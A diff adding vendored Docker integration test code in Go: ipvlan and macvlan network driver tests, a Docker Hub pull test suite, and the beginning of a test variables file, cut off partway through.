check.NotNil) + // cleanup the master interface which also collects the slave dev + deleteInterface(c, "dm-dummy0") +} + +func (s *DockerNetworkSuite) TestDockerNetworkIpvlanOverlapParent(c *check.C) { + // verify the same parent interface cannot be used if already in use by an existing network + testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) + // master dummy interface 'dm' abbreviation represents 'docker ipvlan' + master := "di-dummy0" + out, err := createMasterDummy(c, master) + c.Assert(err, check.IsNil, check.Commentf(out)) + out, err = createVlanInterface(c, master, "di-dummy0.30", "30") + c.Assert(err, check.IsNil, check.Commentf(out)) + // create a network using an existing parent interface + dockerCmd(c, "network", "create", "--driver=ipvlan", "-o", "parent=di-dummy0.30", "di-subinterface") + assertNwIsAvailable(c, "di-subinterface") + // attempt to create another network using the same parent iface that should fail + out, _, err = dockerCmdWithError("network", "create", "--driver=ipvlan", "-o", "parent=di-dummy0.30", "di-parent-net-overlap") + // verify that the overlap returns an error + c.Assert(err, check.NotNil) + // cleanup the master interface which also collects the slave dev + deleteInterface(c, "di-dummy0") +} + +func (s *DockerNetworkSuite) TestDockerNetworkMacvlanMultiSubnet(c *check.C) { + // create a dual stack multi-subnet Macvlan bridge mode network and validate connectivity between four containers, two on each subnet + testRequires(c, DaemonIsLinux, IPv6, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) + dockerCmd(c, "network", "create", "--driver=macvlan", "--ipv6", "--subnet=172.28.100.0/24", "--subnet=172.28.102.0/24", "--gateway=172.28.102.254", + "--subnet=2001:db8:abc2::/64", "--subnet=2001:db8:abc4::/64", "--gateway=2001:db8:abc4::254", "dualstackbridge") + // Ensure the network was created + assertNwIsAvailable(c, "dualstackbridge") + // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.100.0/24 and 2001:db8:abc2::/64 + dockerCmd(c, "run", "-d", "--net=dualstackbridge", "--name=first", "--ip", "172.28.100.20", "--ip6", "2001:db8:abc2::20", "busybox", "top") + dockerCmd(c, "run", "-d", "--net=dualstackbridge", "--name=second", "--ip", "172.28.100.21", "--ip6", "2001:db8:abc2::21", "busybox", "top") + + // Inspect and store the v4 address from specified container on the network dualstackbridge + ip := inspectField(c, "first", "NetworkSettings.Networks.dualstackbridge.IPAddress") + // Inspect and store the v6 address from specified container on the network dualstackbridge + ip6 := inspectField(c, "first", "NetworkSettings.Networks.dualstackbridge.GlobalIPv6Address") + + // verify ipv4 connectivity to the explicit --ipv address second to first + _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", strings.TrimSpace(ip)) + c.Assert(err, check.IsNil) + // verify ipv6 connectivity to the explicit --ipv6 address second to first + c.Skip("Temporarily skipping while invesitigating sporadic v6 CI issues") + _, _, err = dockerCmdWithError("exec", "second", "ping6", "-c", "1", strings.TrimSpace(ip6)) + c.Assert(err, check.IsNil) + + // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.102.0/24 and 2001:db8:abc4::/64 + dockerCmd(c, "run", "-d", "--net=dualstackbridge", "--name=third", "--ip", "172.28.102.20", "--ip6", "2001:db8:abc4::20", "busybox", "top") + dockerCmd(c, "run", "-d", "--net=dualstackbridge", "--name=fourth", "--ip", "172.28.102.21", "--ip6", "2001:db8:abc4::21", "busybox", "top") + + // Inspect and store the v4 address from specified container on the network dualstackbridge + ip = inspectField(c, "third", "NetworkSettings.Networks.dualstackbridge.IPAddress") + // Inspect and store the v6 address from specified container on the network dualstackbridge + ip6 = inspectField(c, "third", "NetworkSettings.Networks.dualstackbridge.GlobalIPv6Address") + + // verify ipv4 connectivity to the explicit --ipv address from third to fourth + _, _, err = dockerCmdWithError("exec", "fourth", "ping", "-c", "1", strings.TrimSpace(ip)) + c.Assert(err, check.IsNil) + // verify ipv6 connectivity to the explicit --ipv6 address from third to fourth + _, _, err = dockerCmdWithError("exec", "fourth", "ping6", "-c", "1", strings.TrimSpace(ip6)) + c.Assert(err, check.IsNil) + + // Inspect the v4 gateway to ensure the proper default GW was assigned + ip4gw := inspectField(c, "first", "NetworkSettings.Networks.dualstackbridge.Gateway") + c.Assert(strings.TrimSpace(ip4gw), check.Equals, "172.28.100.1") + // Inspect the v6 gateway to ensure the proper default GW was assigned + ip6gw := inspectField(c, "first", "NetworkSettings.Networks.dualstackbridge.IPv6Gateway") + c.Assert(strings.TrimSpace(ip6gw), check.Equals, "2001:db8:abc2::1") + + // Inspect the v4 gateway to ensure the proper explicitly assigned default GW was assigned + ip4gw = inspectField(c, "third", "NetworkSettings.Networks.dualstackbridge.Gateway") + c.Assert(strings.TrimSpace(ip4gw), check.Equals, "172.28.102.254") + // Inspect the v6 gateway to ensure the proper explicitly assigned default GW was assigned + ip6gw = inspectField(c, "third", "NetworkSettings.Networks.dualstackbridge.IPv6Gateway") + c.Assert(strings.TrimSpace(ip6gw), check.Equals, "2001:db8:abc4::254") +} + +func (s *DockerNetworkSuite) TestDockerNetworkIpvlanL2MultiSubnet(c *check.C) { + // create a dual stack multi-subnet Ipvlan L2 network and validate connectivity within the subnets, two on each subnet + testRequires(c, DaemonIsLinux, IPv6, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) + dockerCmd(c, "network", "create", "--driver=ipvlan", "--ipv6", "--subnet=172.28.200.0/24", "--subnet=172.28.202.0/24", "--gateway=172.28.202.254", + "--subnet=2001:db8:abc8::/64", "--subnet=2001:db8:abc6::/64", "--gateway=2001:db8:abc6::254", "dualstackl2") + // Ensure the network was created + assertNwIsAvailable(c, "dualstackl2") + // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.200.0/24 and 2001:db8:abc8::/64 + dockerCmd(c, "run", "-d", "--net=dualstackl2", "--name=first", "--ip", "172.28.200.20", "--ip6", "2001:db8:abc8::20", "busybox", "top") + dockerCmd(c, "run", "-d", "--net=dualstackl2", "--name=second", "--ip", "172.28.200.21", "--ip6", "2001:db8:abc8::21", "busybox", "top") + + // Inspect and store the v4 address from specified container on the network dualstackl2 + ip := inspectField(c, "first", "NetworkSettings.Networks.dualstackl2.IPAddress") + // Inspect and store the v6 address from specified container on the network dualstackl2 + ip6 := inspectField(c, "first", "NetworkSettings.Networks.dualstackl2.GlobalIPv6Address") + + // verify ipv4 connectivity to the explicit --ipv address second to first + _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", strings.TrimSpace(ip)) + c.Assert(err, check.IsNil) + // verify ipv6 connectivity to the explicit --ipv6 address second to first + _, _, err = dockerCmdWithError("exec", "second", "ping6", "-c", "1", strings.TrimSpace(ip6)) + c.Assert(err, check.IsNil) + + // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.202.0/24 and 2001:db8:abc6::/64 + dockerCmd(c, "run", "-d", "--net=dualstackl2", "--name=third", "--ip", "172.28.202.20", "--ip6", "2001:db8:abc6::20", "busybox", "top") + dockerCmd(c, "run", "-d", "--net=dualstackl2", "--name=fourth", "--ip", "172.28.202.21", "--ip6", "2001:db8:abc6::21", "busybox", "top") + + // Inspect and store the v4 address from specified container on the network dualstackl2 + ip = inspectField(c, "third", "NetworkSettings.Networks.dualstackl2.IPAddress") + // Inspect and store the v6 address from specified container on the network dualstackl2 + ip6 = inspectField(c, "third", "NetworkSettings.Networks.dualstackl2.GlobalIPv6Address") + + // verify ipv4 connectivity to the explicit --ipv address from third to fourth + _, _, err = dockerCmdWithError("exec", "fourth", "ping", "-c", "1", strings.TrimSpace(ip)) + c.Assert(err, check.IsNil) + // verify ipv6 connectivity to the explicit --ipv6 address from third to fourth + _, _, err = dockerCmdWithError("exec", "fourth", "ping6", "-c", "1", strings.TrimSpace(ip6)) + c.Assert(err, check.IsNil) + + // Inspect the v4 gateway to ensure the proper default GW was assigned + ip4gw := inspectField(c, "first", "NetworkSettings.Networks.dualstackl2.Gateway") + c.Assert(strings.TrimSpace(ip4gw), check.Equals, "172.28.200.1") + // Inspect the v6 gateway to ensure the proper default GW was assigned + ip6gw := inspectField(c, "first", "NetworkSettings.Networks.dualstackl2.IPv6Gateway") + c.Assert(strings.TrimSpace(ip6gw), check.Equals, "2001:db8:abc8::1") + + // Inspect the v4 gateway to ensure the proper explicitly assigned default GW was assigned + ip4gw = inspectField(c, "third", "NetworkSettings.Networks.dualstackl2.Gateway") + c.Assert(strings.TrimSpace(ip4gw), check.Equals, "172.28.202.254") + // Inspect the v6 gateway to ensure the proper explicitly assigned default GW was assigned + ip6gw = inspectField(c, "third", "NetworkSettings.Networks.dualstackl2.IPv6Gateway") + c.Assert(strings.TrimSpace(ip6gw), check.Equals, "2001:db8:abc6::254") +} + +func (s *DockerNetworkSuite) TestDockerNetworkIpvlanL3MultiSubnet(c *check.C) { + // create a dual stack multi-subnet Ipvlan L3 network and validate connectivity between all four containers per L3 mode + testRequires(c, DaemonIsLinux, IPv6, IpvlanKernelSupport, NotUserNamespace, NotArm, IPv6, ExperimentalDaemon) + dockerCmd(c, "network", "create", "--driver=ipvlan", "--ipv6", "--subnet=172.28.10.0/24", "--subnet=172.28.12.0/24", "--gateway=172.28.12.254", + "--subnet=2001:db8:abc9::/64", "--subnet=2001:db8:abc7::/64", "--gateway=2001:db8:abc7::254", "-o", "ipvlan_mode=l3", "dualstackl3") + // Ensure the network was created + assertNwIsAvailable(c, "dualstackl3") + + // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.10.0/24 and 2001:db8:abc9::/64 + dockerCmd(c, "run", "-d", "--net=dualstackl3", "--name=first", "--ip", "172.28.10.20", "--ip6", "2001:db8:abc9::20", "busybox", "top") + dockerCmd(c, "run", "-d", "--net=dualstackl3", "--name=second", "--ip", "172.28.10.21", "--ip6", "2001:db8:abc9::21", "busybox", "top") + + // Inspect and store the v4 address from specified container on the network dualstackl3 + ip := inspectField(c, "first", "NetworkSettings.Networks.dualstackl3.IPAddress") + // Inspect and store the v6 address from specified container on the network dualstackl3 + ip6 := inspectField(c, "first", "NetworkSettings.Networks.dualstackl3.GlobalIPv6Address") + + // verify ipv4 connectivity to the explicit --ipv address second to first + _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", strings.TrimSpace(ip)) + c.Assert(err, check.IsNil) + // verify ipv6 connectivity to the explicit --ipv6 address second to first + _, _, err = dockerCmdWithError("exec", "second", "ping6", "-c", "1", strings.TrimSpace(ip6)) + c.Assert(err, check.IsNil) + + // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.12.0/24 and 2001:db8:abc7::/64 + dockerCmd(c, "run", "-d", "--net=dualstackl3", "--name=third", "--ip", "172.28.12.20", "--ip6", "2001:db8:abc7::20", "busybox", "top") + dockerCmd(c, "run", "-d", "--net=dualstackl3", "--name=fourth", "--ip", "172.28.12.21", "--ip6", "2001:db8:abc7::21", "busybox", "top") + + // Inspect and store the v4 address from specified container on the network dualstackl3 + ip = inspectField(c, "third", "NetworkSettings.Networks.dualstackl3.IPAddress") + // Inspect and store the v6 address from specified container on the network dualstackl3 + ip6 = inspectField(c, "third", "NetworkSettings.Networks.dualstackl3.GlobalIPv6Address") + + // verify ipv4 connectivity to the explicit --ipv address from third to fourth + _, _, err = dockerCmdWithError("exec", "fourth", "ping", "-c", "1", strings.TrimSpace(ip)) + c.Assert(err, check.IsNil) + // verify ipv6 connectivity to the explicit --ipv6 address from third to fourth + _, _, err = dockerCmdWithError("exec", "fourth", "ping6", "-c", "1", strings.TrimSpace(ip6)) + c.Assert(err, check.IsNil) + + // Inspect and store the v4 address from specified container on the network dualstackl3 + ip = inspectField(c, "second", "NetworkSettings.Networks.dualstackl3.IPAddress") + // Inspect and store the v6 address from specified container on the network dualstackl3 + ip6 = inspectField(c, "second", "NetworkSettings.Networks.dualstackl3.GlobalIPv6Address") + + // Verify connectivity across disparate subnets which is unique to L3 mode only + _, _, err = dockerCmdWithError("exec", "third", "ping", "-c", "1", strings.TrimSpace(ip)) + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "third", "ping6", "-c", "1", strings.TrimSpace(ip6)) + c.Assert(err, check.IsNil) + + // Inspect the v4 gateway to ensure no next hop is assigned in L3 mode + ip4gw := inspectField(c, "first", "NetworkSettings.Networks.dualstackl3.Gateway") + c.Assert(strings.TrimSpace(ip4gw), check.Equals, "") + // Inspect the v6 gateway to ensure the explicitly specified default GW is ignored per L3 mode enabled + ip6gw := inspectField(c, "third", "NetworkSettings.Networks.dualstackl3.IPv6Gateway") + c.Assert(strings.TrimSpace(ip6gw), check.Equals, "") +} + +func (s *DockerNetworkSuite) TestDockerNetworkIpvlanAddressing(c *check.C) { + // Ensure the default gateways, next-hops and default dev devices are properly set + testRequires(c, DaemonIsLinux, IPv6, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) + dockerCmd(c, "network", "create", "--driver=macvlan", "--ipv6", "--subnet=172.28.130.0/24", + "--subnet=2001:db8:abca::/64", "--gateway=2001:db8:abca::254", "-o", "macvlan_mode=bridge", "dualstackbridge") + assertNwIsAvailable(c, "dualstackbridge") + dockerCmd(c, "run", "-d", "--net=dualstackbridge", "--name=first", "busybox", "top") + // Validate macvlan bridge mode defaults gateway sets the default IPAM next-hop inferred from the subnet + out, _, err := dockerCmdWithError("exec", "first", "ip", "route") + c.Assert(err, check.IsNil) + c.Assert(out, checker.Contains, "default via 172.28.130.1 dev eth0") + // Validate macvlan bridge mode sets the v6 gateway to the user specified default gateway/next-hop + out, _, err = dockerCmdWithError("exec", "first", "ip", "-6", "route") + c.Assert(err, check.IsNil) + c.Assert(out, checker.Contains, "default via 2001:db8:abca::254 dev eth0") + + // Verify ipvlan l2 mode sets the proper default gateway routes via netlink + // for either an explicitly set route by the user or inferred via default IPAM + dockerCmd(c, "network", "create", "--driver=ipvlan", "--ipv6", "--subnet=172.28.140.0/24", "--gateway=172.28.140.254", + "--subnet=2001:db8:abcb::/64", "-o", "ipvlan_mode=l2", "dualstackl2") + assertNwIsAvailable(c, "dualstackl2") + dockerCmd(c, "run", "-d", "--net=dualstackl2", "--name=second", "busybox", "top") + // Validate ipvlan l2 mode defaults gateway sets the default IPAM next-hop inferred from the subnet + out, _, err = dockerCmdWithError("exec", "second", "ip", "route") + c.Assert(err, check.IsNil) + c.Assert(out, checker.Contains, "default via 172.28.140.254 dev eth0") + // Validate ipvlan l2 mode sets the v6 gateway to the user specified default gateway/next-hop + out, _, err = dockerCmdWithError("exec", "second", "ip", "-6", "route") + c.Assert(err, check.IsNil) + c.Assert(out, checker.Contains, "default via 2001:db8:abcb::1 dev eth0") + + // Validate ipvlan l3 mode sets the v4 gateway to dev eth0 and disregards any explicit or inferred next-hops + dockerCmd(c, "network", "create", "--driver=ipvlan", "--ipv6", "--subnet=172.28.160.0/24", "--gateway=172.28.160.254", + "--subnet=2001:db8:abcd::/64", "--gateway=2001:db8:abcd::254", "-o", "ipvlan_mode=l3", "dualstackl3") + assertNwIsAvailable(c, "dualstackl3") + dockerCmd(c, "run", "-d", "--net=dualstackl3", "--name=third", "busybox", "top") + // Validate ipvlan l3 mode sets the v4 gateway to dev eth0 and disregards any explicit or inferred next-hops + out, _, err = dockerCmdWithError("exec", "third", "ip", "route") + c.Assert(err, check.IsNil) + c.Assert(out, checker.Contains, "default dev eth0") + // Validate ipvlan l3 mode sets the v6 gateway to dev eth0 and disregards any explicit or inferred next-hops + out, _, err = dockerCmdWithError("exec", "third", "ip", "-6", "route") + c.Assert(err, check.IsNil) + c.Assert(out, checker.Contains, "default dev eth0") +} + +func (s *DockerSuite) TestDockerNetworkMacVlanBridgeNilParent(c *check.C) { + // macvlan bridge mode - dummy parent interface is provisioned dynamically + testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) + dockerCmd(c, "network", "create", "--driver=macvlan", "dm-nil-parent") + assertNwIsAvailable(c, "dm-nil-parent") + + // start two containers on the same subnet + dockerCmd(c, "run", "-d", "--net=dm-nil-parent", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + dockerCmd(c, "run", "-d", "--net=dm-nil-parent", "--name=second", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + + // intra-network communications should succeed + _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) +} + +func (s *DockerSuite) TestDockerNetworkMacVlanBridgeInternalMode(c *check.C) { + // macvlan bridge mode --internal containers can communicate inside the network but not externally + testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) + dockerCmd(c, "network", "create", "--driver=macvlan", "--internal", "dm-internal") + assertNwIsAvailable(c, "dm-internal") + nr := getNetworkResource(c, "dm-internal") + c.Assert(nr.Internal, checker.True) + + // start two containers on the same subnet + dockerCmd(c, "run", "-d", "--net=dm-internal", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + dockerCmd(c, "run", "-d", "--net=dm-internal", "--name=second", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + + // access outside of the network should fail + result := dockerCmdWithTimeout(time.Second, "exec", "first", "ping", "-c", "1", "-w", "1", "8.8.8.8") + c.Assert(result, icmd.Matches, icmd.Expected{Timeout: true}) + + // intra-network communications should succeed + _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) +} + +func (s *DockerSuite) TestDockerNetworkIpvlanL2NilParent(c *check.C) { + // ipvlan l2 mode - dummy parent interface is provisioned dynamically + testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) + dockerCmd(c, "network", "create", "--driver=ipvlan", "di-nil-parent") + assertNwIsAvailable(c, "di-nil-parent") + + // start two containers on the same subnet + dockerCmd(c, "run", "-d", "--net=di-nil-parent", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + dockerCmd(c, "run", "-d", "--net=di-nil-parent", "--name=second", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + + // intra-network communications should succeed + _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) +} + +func (s *DockerSuite) TestDockerNetworkIpvlanL2InternalMode(c *check.C) { + // ipvlan l2 mode --internal containers can communicate inside the network but not externally + testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) + dockerCmd(c, "network", "create", "--driver=ipvlan", "--internal", "di-internal") + assertNwIsAvailable(c, "di-internal") + nr := getNetworkResource(c, "di-internal") + c.Assert(nr.Internal, checker.True) + + // start two containers on the same subnet + dockerCmd(c, "run", "-d", "--net=di-internal", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + dockerCmd(c, "run", "-d", "--net=di-internal", "--name=second", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + + // access outside of the network should fail + result := dockerCmdWithTimeout(time.Second, "exec", "first", "ping", "-c", "1", "-w", "1", "8.8.8.8") + c.Assert(result, icmd.Matches, icmd.Expected{Timeout: true}) + // intra-network communications should succeed + _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) +} + +func (s *DockerSuite) TestDockerNetworkIpvlanL3NilParent(c *check.C) { + // ipvlan l3 mode - dummy parent interface is provisioned dynamically + testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) + dockerCmd(c, "network", "create", "--driver=ipvlan", "--subnet=172.28.230.0/24", + "--subnet=172.28.220.0/24", "-o", "ipvlan_mode=l3", "di-nil-parent-l3") + assertNwIsAvailable(c, "di-nil-parent-l3") + + // start two containers on separate subnets + dockerCmd(c, "run", "-d", "--ip=172.28.220.10", "--net=di-nil-parent-l3", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + dockerCmd(c, "run", "-d", "--ip=172.28.230.10", "--net=di-nil-parent-l3", "--name=second", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + + // intra-network communications should succeed + _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) +} + +func (s *DockerSuite) TestDockerNetworkIpvlanL3InternalMode(c *check.C) { + // ipvlan l3 mode --internal containers can communicate inside the network but not externally + testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) + dockerCmd(c, "network", "create", "--driver=ipvlan", "--subnet=172.28.230.0/24", + "--subnet=172.28.220.0/24", "-o", "ipvlan_mode=l3", "--internal", "di-internal-l3") + assertNwIsAvailable(c, "di-internal-l3") + nr := getNetworkResource(c, "di-internal-l3") + c.Assert(nr.Internal, checker.True) + + // start two containers on separate subnets + dockerCmd(c, "run", "-d", "--ip=172.28.220.10", "--net=di-internal-l3", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + dockerCmd(c, "run", "-d", "--ip=172.28.230.10", "--net=di-internal-l3", "--name=second", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + + // access outside of the network should fail + result := dockerCmdWithTimeout(time.Second, "exec", "first", "ping", "-c", "1", "-w", "1", "8.8.8.8") + c.Assert(result, icmd.Matches, icmd.Expected{Timeout: true}) + // intra-network communications should succeed + _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) +} + +func (s *DockerSuite) TestDockerNetworkMacVlanExistingParent(c *check.C) { + // macvlan bridge mode - empty parent interface containers can reach each other internally but not externally + testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) + netName := "dm-parent-exists" + out, err := createMasterDummy(c, "dm-dummy0") + //out, err := createVlanInterface(c, "dm-parent", "dm-slave", "macvlan", "bridge") + c.Assert(err, check.IsNil, check.Commentf(out)) + // create a network using an existing parent interface + dockerCmd(c, "network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0", netName) + assertNwIsAvailable(c, netName) + // delete the network while preserving the parent link + dockerCmd(c, "network", "rm", netName) + assertNwNotAvailable(c, netName) + // verify the network delete did not delete the predefined link + out, err = linkExists(c, "dm-dummy0") + c.Assert(err, check.IsNil, check.Commentf(out)) + deleteInterface(c, "dm-dummy0") + c.Assert(err, check.IsNil, check.Commentf(out)) +} + +func (s *DockerSuite) TestDockerNetworkMacVlanSubinterface(c *check.C) { + // macvlan bridge mode - empty parent interface containers can reach each other internally but not externally + testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) + netName := "dm-subinterface" + out, err := createMasterDummy(c, "dm-dummy0") + c.Assert(err, check.IsNil, check.Commentf(out)) + out, err = createVlanInterface(c, "dm-dummy0", "dm-dummy0.20", "20") + c.Assert(err, check.IsNil, check.Commentf(out)) + // create a network using an existing parent interface + dockerCmd(c, "network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0.20", netName) + assertNwIsAvailable(c, netName) + + // start containers on 802.1q tagged '-o parent' sub-interface + dockerCmd(c, "run", "-d", "--net=dm-subinterface", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + dockerCmd(c, "run", "-d", "--net=dm-subinterface", "--name=second", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + // verify containers can communicate + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) + + // remove the containers + dockerCmd(c, "rm", "-f", "first") + dockerCmd(c, "rm", "-f", "second") + // delete the network while preserving the parent link + dockerCmd(c, "network", "rm", netName) + assertNwNotAvailable(c, netName) + // verify the network delete did not delete the predefined sub-interface + out, err = linkExists(c, "dm-dummy0.20") + c.Assert(err, check.IsNil, check.Commentf(out)) + // delete the parent interface which also collects the slave + deleteInterface(c, "dm-dummy0") + c.Assert(err, check.IsNil, check.Commentf(out)) +} + +func createMasterDummy(c *check.C, master string) (string, error) { + // ip link add type dummy + args := []string{"link", "add", master, "type", "dummy"} + ipLinkCmd := exec.Command("ip", args...) + out, _, err := runCommandWithOutput(ipLinkCmd) + if err != nil { + return out, err + } + // ip link set dummy_name up + args = []string{"link", "set", master, "up"} + ipLinkCmd = exec.Command("ip", args...) + out, _, err = runCommandWithOutput(ipLinkCmd) + if err != nil { + return out, err + } + return out, err +} + +func createVlanInterface(c *check.C, master, slave, id string) (string, error) { + // ip link add link name . type vlan id + args := []string{"link", "add", "link", master, "name", slave, "type", "vlan", "id", id} + ipLinkCmd := exec.Command("ip", args...) + out, _, err := runCommandWithOutput(ipLinkCmd) + if err != nil { + return out, err + } + // ip link set up + args = []string{"link", "set", slave, "up"} + ipLinkCmd = exec.Command("ip", args...) + out, _, err = runCommandWithOutput(ipLinkCmd) + if err != nil { + return out, err + } + return out, err +} + +func linkExists(c *check.C, master string) (string, error) { + // verify the specified link exists, ip link show + args := []string{"link", "show", master} + ipLinkCmd := exec.Command("ip", args...) + out, _, err := runCommandWithOutput(ipLinkCmd) + if err != nil { + return out, err + } + return out, err +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_hub_pull_suite_test.go b/vendor/github.com/docker/docker/integration-cli/docker_hub_pull_suite_test.go new file mode 100644 index 0000000000..df52cae1a4 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_hub_pull_suite_test.go @@ -0,0 +1,90 @@ +package main + +import ( + "os/exec" + "runtime" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func init() { + // FIXME. Temporarily turning this off for Windows as GH16039 was breaking + // Windows to Linux CI @icecrime + if runtime.GOOS != "windows" { + check.Suite(newDockerHubPullSuite()) + } +} + +// DockerHubPullSuite provides an isolated daemon that doesn't have all the +// images that are baked into our 'global' test environment daemon (e.g., +// busybox, httpserver, ...). +// +// We use it for push/pull tests where we want to start fresh, and measure the +// relative impact of each individual operation. As part of this suite, all +// images are removed after each test. +type DockerHubPullSuite struct { + d *Daemon + ds *DockerSuite +} + +// newDockerHubPullSuite returns a new instance of a DockerHubPullSuite. +func newDockerHubPullSuite() *DockerHubPullSuite { + return &DockerHubPullSuite{ + ds: &DockerSuite{}, + } +} + +// SetUpSuite starts the suite daemon. +func (s *DockerHubPullSuite) SetUpSuite(c *check.C) { + testRequires(c, DaemonIsLinux) + s.d = NewDaemon(c) + err := s.d.Start() + c.Assert(err, checker.IsNil, check.Commentf("starting push/pull test daemon: %v", err)) +} + +// TearDownSuite stops the suite daemon. +func (s *DockerHubPullSuite) TearDownSuite(c *check.C) { + if s.d != nil { + err := s.d.Stop() + c.Assert(err, checker.IsNil, check.Commentf("stopping push/pull test daemon: %v", err)) + } +} + +// SetUpTest declares that all tests of this suite require network. +func (s *DockerHubPullSuite) SetUpTest(c *check.C) { + testRequires(c, Network) +} + +// TearDownTest removes all images from the suite daemon. +func (s *DockerHubPullSuite) TearDownTest(c *check.C) { + out := s.Cmd(c, "images", "-aq") + images := strings.Split(out, "\n") + images = append([]string{"rmi", "-f"}, images...) + s.d.Cmd(images...) + s.ds.TearDownTest(c) +} + +// Cmd executes a command against the suite daemon and returns the combined +// output. The function fails the test when the command returns an error. +func (s *DockerHubPullSuite) Cmd(c *check.C, name string, arg ...string) string { + out, err := s.CmdWithError(name, arg...) + c.Assert(err, checker.IsNil, check.Commentf("%q failed with errors: %s, %v", strings.Join(arg, " "), out, err)) + return out +} + +// CmdWithError executes a command against the suite daemon and returns the +// combined output as well as any error. +func (s *DockerHubPullSuite) CmdWithError(name string, arg ...string) (string, error) { + c := s.MakeCmd(name, arg...) + b, err := c.CombinedOutput() + return string(b), err +} + +// MakeCmd returns an exec.Cmd command to run against the suite daemon. +func (s *DockerHubPullSuite) MakeCmd(name string, arg ...string) *exec.Cmd { + args := []string{"--host", s.d.sock(), name} + args = append(args, arg...) + return exec.Command(dockerBinary, args...) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_test_vars.go b/vendor/github.com/docker/docker/integration-cli/docker_test_vars.go new file mode 100644 index 0000000000..3559bfdbb7 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_test_vars.go @@ -0,0 +1,165 @@ +package main + +import ( + "encoding/json" + "fmt" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "strconv" + + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/pkg/reexec" +) + +var ( + // the docker client binary to use + dockerBinary = "docker" + // the docker daemon binary to use + dockerdBinary = "dockerd" + + // path to containerd's ctr binary + ctrBinary = "docker-containerd-ctr" + + // the private registry image to use for tests involving the registry + registryImageName = "registry" + + // the private registry to use for tests + privateRegistryURL = "127.0.0.1:5000" + + // TODO Windows CI. These are incorrect and need fixing into + // platform specific pieces. + runtimePath = "/var/run/docker" + + workingDirectory string + + // isLocalDaemon is true if the daemon under test is on the same + // host as the CLI. + isLocalDaemon bool + + // daemonPlatform is held globally so that tests can make intelligent + // decisions on how to configure themselves according to the platform + // of the daemon. This is initialized in docker_utils by sending + // a version call to the daemon and examining the response header. + daemonPlatform string + + // windowsDaemonKV is used on Windows to distinguish between different + // versions. This is necessary to enable certain tests based on whether + // the platform supports it. For example, Windows Server 2016 TP3 did + // not support volumes, but TP4 did. + windowsDaemonKV int + + // daemonDefaultImage is the name of the default image to use when running + // tests. This is platform dependent. + daemonDefaultImage string + + // For a local daemon on Linux, these values will be used for testing + // user namespace support as the standard graph path(s) will be + // appended with the root remapped uid.gid prefix + dockerBasePath string + volumesConfigPath string + containerStoragePath string + + // experimentalDaemon tell whether the main daemon has + // experimental features enabled or not + experimentalDaemon bool + + // daemonStorageDriver is held globally so that tests can know the storage + // driver of the daemon. This is initialized in docker_utils by sending + // a version call to the daemon and examining the response header. + daemonStorageDriver string + + // WindowsBaseImage is the name of the base image for Windows testing + // Environment variable WINDOWS_BASE_IMAGE can override this + 